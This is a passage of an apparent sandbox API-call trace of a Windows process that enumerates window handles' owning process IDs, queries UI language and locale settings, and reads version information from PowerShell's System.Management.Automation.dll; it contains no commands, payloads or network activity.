	[0492.923] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1198
	[0492.923] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1080
	[0492.923] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1074
	[0492.923] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x106c
	[0492.923] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1474
	[0492.923] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1414
	[0492.923] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xbd0
	[0492.924] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x550
	[0492.924] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xa38
	[0492.924] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x16d0
	[0492.924] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x16d4
	[0492.924] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x15bc
	[0492.924] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x15a0
	[0492.924] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x159c
	[0492.924] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1598
	[0492.924] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1594
	[0492.924] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1590
	[0492.924] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x158c
	[0492.925] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1588
	[0492.925] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1584
	[0492.925] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1580
	[0492.925] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x157c
	[0492.925] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1488
	[0492.925] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1404
	[0492.925] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x11b8
	[0492.925] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xbd4
	[0492.925] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xe0c
	[0492.925] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xd30
	[0492.925] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xe70
	[0492.926] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x13b8
	[0492.926] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xe20
	[0492.926] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xe2c
	[0492.926] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xe00
	[0492.926] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xe04
	[0492.926] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xc94
	[0492.926] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x13b0
	[0492.926] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x13ac
	[0492.926] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x13a8
	[0492.926] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1374
	[0492.926] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x132c
	[0492.927] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1328
	[0492.927] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x12d0
	[0492.927] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x12cc
	[0492.927] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x12c8
	[0492.927] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1290
	[0492.927] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1218
	[0492.927] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1214
	[0492.927] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x11ec
	[0492.927] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x11e8
	[0492.927] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x11cc
	[0492.927] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1140
	[0492.928] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xe6c
	[0492.928] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x6e8
	[0492.928] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xc6c
	[0492.928] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xf94
	[0492.928] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xffc
	[0492.928] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xf74
	[0492.928] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xf08
	[0492.928] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xf0c
	[0492.928] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xed8
	[0492.928] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xe90
	[0492.928] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xea8
	[0492.929] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xfa8
	[0492.929] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xfbc
	[0492.929] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xfb8
	[0492.929] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xfb4
	[0492.929] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xfb0
	[0492.929] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xfac
	[0492.929] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xfc0
	[0492.929] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xfd0
	[0492.929] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xf88
	[0492.929] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xf84
	[0492.929] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xf80
	[0492.930] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xde0
	[0492.930] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xddc
	[0492.930] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xdd8
	[0492.930] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xd34
	[0492.930] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xd10
	[0492.930] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xd0c
	[0492.930] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xc9c
	[0492.930] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xc74
	[0492.930] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xc1c
	[0492.930] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xc08
	[0492.930] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xabc
	[0492.931] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x24c
	[0492.931] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xbb0
	[0492.931] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xbfc
	[0492.931] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xb10
	[0492.931] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x374
	[0492.931] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x368
	[0492.931] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xb28
	[0492.931] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xae8
	[0492.931] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xb14
	[0492.931] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x95c
	[0492.931] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xa8c
	[0492.932] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x46c
	[0492.932] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xb3c
	[0492.932] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xa90
	[0492.932] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xad0
	[0492.932] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xa9c
	[0492.932] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xaa0
	[0492.932] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xb1c
	[0492.932] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x7e0
	[0492.932] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xa74
	[0492.932] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x694
	[0492.933] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xa28
	[0492.933] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x9b0
	[0492.933] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x8d8
	[0492.933] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x940
	[0492.933] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x93c
	[0492.933] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x4ec
	[0492.933] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x150
	[0492.933] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x720
	[0492.933] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x3c4
	[0492.933] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x7d4
	[0492.933] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x6c8
	[0492.934] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xb54
	[0492.934] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xb54
	[0492.934] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xb5c
	[0492.934] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x838
	[0492.934] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x818
	[0492.934] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x5b8
	[0492.934] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x494
	[0492.934] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x1ec
	[0492.934] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x440
	[0492.934] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x7e8
	[0492.934] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x730
	[0492.935] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x2c8
	[0492.935] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x31c
	[0492.935] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x330
	[0492.935] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x128
	[0492.935] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x5c8
	[0492.935] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x6f8
	[0492.935] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x358
	[0492.935] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x73c
	[0492.935] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0xb0
	[0492.935] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x250
	[0492.936] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x240
	[0492.936] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x790
	[0492.936] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x61c
	[0492.936] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x568
	[0492.936] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x538
	[0492.936] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x24da40 | out: lpdwProcessId=0x24da40) returned 0x540
	[0492.940] WerSetFlags () returned 0x0
	[0492.947] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0494.040] CoTaskMemFree (pv=0x0) 
	[0494.041] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x24dda8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x24dda0 | out: pulNumLanguages=0x24dda8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x24dda0) returned 1
	[0494.041] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x24dda8, pwszLanguagesBuffer=0x2ef6358, pcchLanguagesBuffer=0x24dda0 | out: pulNumLanguages=0x24dda8, pwszLanguagesBuffer=0x2ef6358, pcchLanguagesBuffer=0x24dda0) returned 1
	[0494.047] CoTaskMemAlloc (cb=0x24) returned 0x18c2a0
	[0494.047] GetUserDefaultLocaleName (in: lpLocaleName=0x18c2a0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0494.047] CoTaskMemFree (pv=0x18c2a0) 
	[0494.069] CoTaskMemAlloc (cb=0x104) returned 0x148170
	[0494.069] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x148170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0494.069] CoTaskMemFree (pv=0x148170) 
	[0494.071] CoTaskMemAlloc (cb=0x104) returned 0x148170
	[0494.071] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x148170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0494.071] CoTaskMemFree (pv=0x148170) 
	[0494.073] CoTaskMemAlloc (cb=0x104) returned 0x148170
	[0494.073] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x148170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0494.073] CoTaskMemFree (pv=0x148170) 
	[0494.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0494.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0494.082] SetErrorMode (uMode=0x1) returned 0x1
	[0494.082] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x24da20 | out: lpFileInformation=0x24da20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0494.082] SetErrorMode (uMode=0x1) returned 0x1
	[0494.082] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x24dc90 | out: lpdwHandle=0x24dc90) returned 0x94c
	[0494.083] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ef9be8 | out: lpData=0x2ef9be8) returned 1
	[0494.084] VerQueryValueW (in: pBlock=0x2ef9be8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24dc08, puLen=0x24dc00 | out: lplpBuffer=0x24dc08*=0x2ef9c84, puLen=0x24dc00) returned 1
	[0494.084] VerQueryValueW (in: pBlock=0x2ef9be8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x24db78, puLen=0x24db70 | out: lplpBuffer=0x24db78*=0x2ef9d60, puLen=0x24db70) returned 1
	[0494.084] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0494.084] CoTaskMemAlloc (cb=0x2e) returned 0x18b5e0
	[0494.084] lstrcpyW (in: lpString1=0x18b5e0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0494.084] CoTaskMemFree (pv=0x18b5e0) 
	[0494.084] VerQueryValueW (in: pBlock=0x2ef9be8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x24db78, puLen=0x24db70 | out: lplpBuffer=0x24db78*=0x2ef9db4, puLen=0x24db70) returned 1
	[0494.084] lstrlenW (lpString="System.Management.Automation") returned 28
	[0494.084] CoTaskMemAlloc (cb=0x3c) returned 0xc9900
	[0494.084] lstrcpyW (in: lpString1=0xc9900, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0494.084] CoTaskMemFree (pv=0xc9900) 
	[0494.084] VerQueryValueW (in: pBlock=0x2ef9be8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x24db78, puLen=0x24db70 | out: lplpBuffer=0x24db78*=0x2ef9e10, puLen=0x24db70) returned 1
	[0494.084] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0494.084] CoTaskMemAlloc (cb=0x20) returned 0x18c300
	[0494.084] lstrcpyW (in: lpString1=0x18c300, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0494.084] CoTaskMemFree (pv=0x18c300) 
	[0494.084] VerQueryValueW (in: pBlock=0x2ef9be8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x24db78, puLen=0x24db70 | out: lplpBuffer=0x24db78*=0x2ef9e50, puLen=0x24db70) returned 1
	[0494.084] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0494.084] CoTaskMemAlloc (cb=0x44) returned 0xc9900
	[0494.084] lstrcpyW (in: lpString1=0xc9900, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0494.084] CoTaskMemFree (pv=0xc9900) 
	[0494.084] VerQueryValueW (in: pBlock=0x2ef9be8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x24db78, puLen=0x24db70 | out: lplpBuffer=0x24db78*=0x2ef9eb8, puLen=0x24db70) returned 1
	[0494.084] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0494.084] CoTaskMemAlloc (cb=0x76) returned 0x1331c0
	[0494.084] lstrcpyW (in: lpString1=0x1331c0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0494.084] CoTaskMemFree (pv=0x1331c0) 
	[0494.084] VerQueryValueW (in: pBlock=0x2ef9be8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x24db78, puLen=0x24db70 | out: lplpBuffer=0x24db78*=0x2ef9f54, puLen=0x24db70) returned 1
	[0494.085] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0494.085] CoTaskMemAlloc (cb=0x44) returned 0xc9900
	[0494.085] lstrcpyW (in: lpString1=0xc9900, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0494.085] CoTaskMemFree (pv=0xc9900) 
	[0494.085] VerQueryValueW (in: pBlock=0x2ef9be8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x24db78, puLen=0x24db70 | out: lplpBuffer=0x24db78*=0x2ef9fb8, puLen=0x24db70) returned 1
	[0494.085] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0494.085] CoTaskMemAlloc (cb=0x58) returned 0xeb120
